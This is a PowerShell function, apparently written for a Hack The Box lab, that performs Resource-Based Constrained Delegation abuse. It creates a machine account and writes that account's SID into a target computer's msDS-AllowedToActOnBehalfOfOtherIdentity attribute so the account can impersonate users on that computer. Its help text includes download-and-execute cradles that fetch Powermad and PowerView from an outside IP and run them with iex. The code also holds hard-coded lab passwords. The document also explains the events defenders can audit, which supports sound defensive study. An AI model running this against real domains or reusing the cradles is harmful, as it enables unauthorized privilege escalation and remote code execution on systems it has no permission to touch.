function Invoke-RbcdPwn {
<#
.SYNOPSIS
Lab walkthrough of Resource-Based Constrained Delegation (RBCD) abuse against a single, hard-coded target computer.

.DESCRIPTION
With an account that already holds write rights on the target computer object, the function creates
a new machine account (Powermad New-MachineAccount), writes that account's SID into the target's
msDS-AllowedToActOnBehalfOfOtherIdentity attribute (PowerView Set-DomainObject), then reads the
attribute back and prints the resulting DACL. Obtaining a ticket afterwards (Rubeus, mentioned in the
trailing comment) is outside this function.

Make sure to import Powermad.ps1 and PowerView.ps1 before you begin:
curl -L https://github.com/Kevin-Robertson/Powermad/raw/master/Powermad.ps1 > pm.ps1
iex(new-object net.webclient).downloadstring("http://10.14.14.37/pm.ps1")
curl -L https://github.com/PowerShellMafia/PowerSploit/raw/dev/Recon/PowerView.ps1 > pv.ps1
iex(new-object net.webclient).downloadstring("http://10.14.14.37/pv.ps1")

Cmdlets used here but not defined in this file: Get-DomainUser, Get-DomainObjectACL,
Get-DomainComputer, Set-DomainObject (PowerView) and New-MachineAccount (Powermad).

.PARAMETER FakeMachine
Name of the machine account to create. It is passed to New-MachineAccount and then resolved with
Get-DomainComputer to obtain the SID that is written into the target's security descriptor.

.OUTPUTS
Progress lines via Write-Host; the matching ACE and the final DiscretionaryAcl via Write-Output (Echo).

.NOTES
Target host, controlling user and both passwords are hard-coded literals for the htb.local lab, so the
function is not reusable as-is. The cleanup step at the very end is commented out, so the delegation
grant remains on the target after the run. From the defender's side a run produces two auditable
events on the domain: a computer-account creation and a write to msDS-AllowedToActOnBehalfOfOtherIdentity
on the target computer object; the latter in particular is worth alerting on.
#>
Param (
[Parameter(Mandatory = $true)]
[String]
$FakeMachine
)
# Lab-specific constants: the computer object to modify and the account that can write to it.
$TargetComputer = 'WEB.htb.local'
$UserWithDaclUsername = 'htb.local\test-svc'
# NOTE(review): plaintext credential in source — readable by anyone with the file and captured by
# transcript / script-block logging. It should come from Get-Credential or a protected file instead.
$UserWithDaclPassword = ConvertTo-SecureString 'T3st-S3v!ce-F0r-Pr0d' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential($UserWithDaclUsername, $UserWithDaclPassword)
Write-Host "[*] Target computer to own: $TargetComputer" -ForegroundColor Green
Write-Host "[*] Owned user account which has permissions to configure RBCD on target computer: $UserWithDaclUsername" -ForegroundColor Green
Write-Host "[*] Verifying that the user indeed has all the necessary rights..." -ForegroundColor Green
# Strip everything up to and including the first backslash ('htb.local\') before the lookup, and
# keep only the ObjectSid of the controlling user.
$AttackerSID = Get-DomainUser $UserWithDaclUsername.Substring($($UserWithDaclUsername.IndexOf('\')) + 1) -Properties 'ObjectSid' -Verbose -Credential $Cred | Select -Expand 'ObjectSid'
# Keep the ACEs on the target whose SecurityIdentifier matches that SID. This is a display-only
# check: nothing below depends on it. NOTE(review): -match is an unanchored regex, so an ACE whose
# SID merely contains this one as a prefix would also pass; -eq would be the exact comparison.
$ACE = Get-DomainObjectACL $TargetComputer -Verbose -Credential $Cred | ?{$_.SecurityIdentifier -match $AttackerSID}
Write-Host "[+] ACE:" -ForegroundColor Green
Echo $ACE
Write-Host "[*] Creating a new machine account with Powermad.ps1..." -ForegroundColor Green
# The new machine account's password is another hard-coded literal (same logging/exposure concern).
New-MachineAccount -MachineAccount $FakeMachine -Password $(ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force) -Verbose -Credential $Cred
$ComputerSid = Get-DomainComputer $FakeMachine -Properties 'ObjectSid' -Verbose -Credential $Cred | Select -Expand 'ObjectSid'
Write-Host "[*] New machine account SID: $ComputerSid" -ForegroundColor Green
Write-Host "[*] Setting the msDS-AllowedToActOnBehalfOfOtherIdentity property on target computer..." -ForegroundColor Green
# SDDL: owner BA (Builtin Administrators), DACL with a single allow ACE whose trustee is the new
# machine account's SID. The rights string appears to be the generic full-control set — not verified here.
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
# Serialise the descriptor into a byte[] sized by BinaryLength; GetBinaryForm fills it from offset 0.
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# The write that actually grants the delegation: raw descriptor bytes go into the target's attribute.
# This directory modification is the event a defender should be auditing for.
Get-DomainComputer $TargetComputer -Verbose -Credential $Cred | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Verbose -Credential $Cred
Write-Host "[*] Confirming that the msDS-AllowedToActOnBehalfOfOtherIdentity property was set correctly..." -ForegroundColor Green
# Read the attribute back and parse it so the DACL can be inspected by eye; no comparison against
# $SDBytes is made, so a mismatch would not fail the function.
$RawBytes = Get-DomainComputer $TargetComputer -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity' -Verbose -Credential $Cred | Select -Expand 'msDS-AllowedToActOnBehalfOfOtherIdentity'
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
Write-Host "[+] Security descriptor:" -ForegroundColor Green
Echo $Descriptor.DiscretionaryAcl
# Clear the msDS-AllowedToActOnBehalfOfOtherIdentity property after you got your TGS with Rubeus:
# Until this is run the grant persists on the target computer object, i.e. it is a standing
# delegation path rather than a one-off, and the created machine account also remains in the domain.
#Get-DomainComputer $TargetComputer -Verbose -Credential $Cred | Set-DomainObject -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity' -Verbose -Credential $Cred
}